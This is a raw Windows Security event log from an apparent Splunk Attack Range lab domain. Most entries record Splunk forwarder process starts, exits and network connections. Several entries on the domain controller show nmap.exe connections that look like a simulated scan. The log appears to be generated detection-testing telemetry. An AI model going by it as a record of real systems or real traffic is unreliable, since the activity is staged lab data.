Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1277
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278955
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1970
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278954
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1970
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278957
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1538
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:27:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278956
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1538
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278959
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x19e0
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278958
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278962
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xc70
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278961
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278960
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53925
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887289
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1278
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887288
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1278
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278964
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x764
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278963
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x764
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:28:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278966
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xd8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:28:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278965
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:28:04 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278967
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53926
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887291
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1279
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887290
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1279
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887293
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887292
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278968
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53927
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887295
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1280
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887294
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1280
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887305
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.24.8.4
Source Port: 0
Destination Address: 127.75.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887304
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8FB87C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 127.0.0.1
Source Port: 1282
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887303
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FB87C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887302
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.16.8.5
Source Port: 0
Destination Address: 114.22.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887301
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 1282
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887300
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 1282
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887299
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1282
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887298
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 128.194.32.0
Source Port: 0
Destination Address: 180.10.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887297
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 1281
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887296
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: ::
Source Port: 1281
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887306
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x18c8
Process Name: C:\Windows\System32\taskhostw.exe
Exit Status: 0x0
04/19/2021 06:28:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278970
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3716
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53929
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278969
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53928
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887308
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1283
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:17 PM
